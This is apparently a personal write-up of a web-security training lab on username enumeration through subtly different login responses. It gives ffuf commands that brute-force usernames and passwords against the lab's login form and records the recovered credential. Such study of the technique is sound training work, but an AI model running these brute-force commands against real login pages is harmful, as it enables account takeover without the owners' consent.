Lab: Username enumeration via subtly different responses

it returns error for both incorrect username and password

It just returns the username al

so i just used it for the username

since it returns different from the rest

ffuf -request req.txt -request-proto https -mode clusterbomb -w usernames.txt:FUZZUSER -w passwords.txt:FUZZPASS -fw 2136,2127

Here i used the username al

with the password wordlist

and we got a redirect

ffuf -w passwords.txt:FUZZ -u https://0abf00b50407080a830c0211000700b6.web-security-academy.net/login -X POST -d 'username=al&password=FUZZ' -H "Content-Type: application/x-www-form-urlencoded"

al:15953

solve it using burp

user al doesnt have 1

now just brute force for password and you will see a different status code

PreviousLab: Username enumeration via different responses NextLab: Username enumeration via response timing

Last updated 1 year ago